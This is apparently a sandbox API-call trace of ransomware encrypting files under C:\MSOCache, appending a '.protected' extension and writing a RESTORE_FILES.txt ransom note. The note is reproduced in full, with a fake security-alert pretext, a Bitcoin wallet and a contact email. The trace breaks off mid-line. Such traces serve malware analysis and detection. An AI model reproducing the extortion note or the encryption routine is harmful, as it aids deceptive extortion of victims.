lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 82 [0057.167] StrStrW (lpFirst="InfoPathMUI.xml", lpSrch=".zip") returned 0x0 [0057.167] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x4cf, lpOverlapped=0x0) returned 1 [0057.295] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffb31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.303] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x4cf, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x4cf, lpOverlapped=0x0) returned 1 [0057.321] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0057.334] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0057.348] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0057.354] CloseHandle (hObject=0xb4) returned 1 [0057.354] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.protected") returned 92 [0057.354] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.protected")) returned 1 [0057.354] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0057.354] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0057.354] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0057.354] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0057.354] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0057.354] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0057.354] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0057.354] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0057.355] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0057.355] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.355] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.355] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0057.355] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0057.355] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0057.355] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0057.355] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0057.355] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0057.355] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0057.355] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x73c, lpOverlapped=0x0) returned 1 [0057.459] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.459] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x73c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x73c, lpOverlapped=0x0) returned 1 [0057.459] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0057.459] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0057.459] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0057.459] CloseHandle (hObject=0xb4) returned 1 [0057.460] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0057.460] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0057.460] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0057.460] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0057.460] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0057.460] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0057.461] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0057.461] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0057.462] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0057.462] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0057.462] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0057.462] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0057.462] CloseHandle (hObject=0xa4) returned 1 [0057.462] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0057.462] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0057.462] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0057.462] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0057.462] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0057.462] lstrcmpiW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0057.462] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C") returned 66 [0057.462] lstrcmpW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0057.462] lstrcmpW (lpString1="{90140000-0054-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0057.462] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*") returned 68 [0057.462] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0057.462] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0057.462] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0057.463] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0057.463] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0057.463] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0057.463] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\.") returned 68 [0057.463] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.463] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0057.463] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0057.463] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.494] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.495] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0057.495] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0057.495] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0057.495] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0057.495] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0057.495] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0057.495] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0057.495] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\..") returned 69 [0057.495] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.495] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.495] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0057.495] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0057.495] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.495] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.495] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0057.495] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0057.495] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0057.495] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0057.495] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0057.495] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0057.496] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0057.496] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0057.496] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0057.496] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0057.496] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.496] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.496] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0057.497] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0057.497] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0057.497] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0057.497] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0057.497] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0057.497] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0057.497] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x1861, lpOverlapped=0x0) returned 1 [0057.512] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffe79f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.512] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x1861, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x1861, lpOverlapped=0x0) returned 1 [0057.512] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0057.512] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0057.512] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0057.512] CloseHandle (hObject=0xb4) returned 1 [0057.512] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0057.512] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0057.541] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0057.541] lstrcmpiW (lpString1="VisioLR.cab", lpString2="Windows") returned -1 [0057.542] lstrcmpiW (lpString1="VisioLR.cab", lpString2="Program Files") returned 1 [0057.542] lstrcmpiW (lpString1="VisioLR.cab", lpString2="Program Files (x86)") returned 1 [0057.542] lstrcmpiW (lpString1="VisioLR.cab", lpString2="$Recycle.bin") returned 1 [0057.542] lstrcmpiW (lpString1="VisioLR.cab", lpString2="System Volume Information") returned 1 [0057.543] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 78 [0057.543] StrStrIW (lpFirst="VisioLR.cab", lpSrch=".protected") returned 0x0 [0057.543] lstrcmpW (lpString1="VisioLR.cab", lpString2="RESTORE_FILES.txt") returned 1 [0057.543] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.543] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.543] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0057.543] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 78 [0057.543] StrStrW (lpFirst="VisioLR.cab", lpSrch=".txt") returned 0x0 [0057.543] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 78 [0057.543] StrStrW (lpFirst="VisioLR.cab", lpSrch=".rar") returned 0x0 [0057.543] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 78 [0057.543] StrStrW (lpFirst="VisioLR.cab", lpSrch=".zip") returned 0x0 [0057.543] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0057.551] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.551] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0057.555] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0057.555] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0057.666] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0057.666] CloseHandle (hObject=0xb4) returned 1 [0057.667] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.protected") returned 88 [0057.667] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.protected")) returned 1 [0057.684] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0057.684] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="Windows") returned -1 [0057.684] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="Program Files") returned 1 [0057.684] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="Program Files (x86)") returned 1 [0057.684] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="$Recycle.bin") returned 1 [0057.684] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="System Volume Information") returned 1 [0057.684] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 79 [0057.684] StrStrIW (lpFirst="VisioMUI.msi", lpSrch=".protected") returned 0x0 [0057.684] lstrcmpW (lpString1="VisioMUI.msi", lpString2="RESTORE_FILES.txt") returned 1 [0057.684] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.684] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.685] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0057.685] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 79 [0057.685] StrStrW (lpFirst="VisioMUI.msi", lpSrch=".txt") returned 0x0 [0057.685] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 79 [0057.685] StrStrW (lpFirst="VisioMUI.msi", lpSrch=".rar") returned 0x0 [0057.685] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All 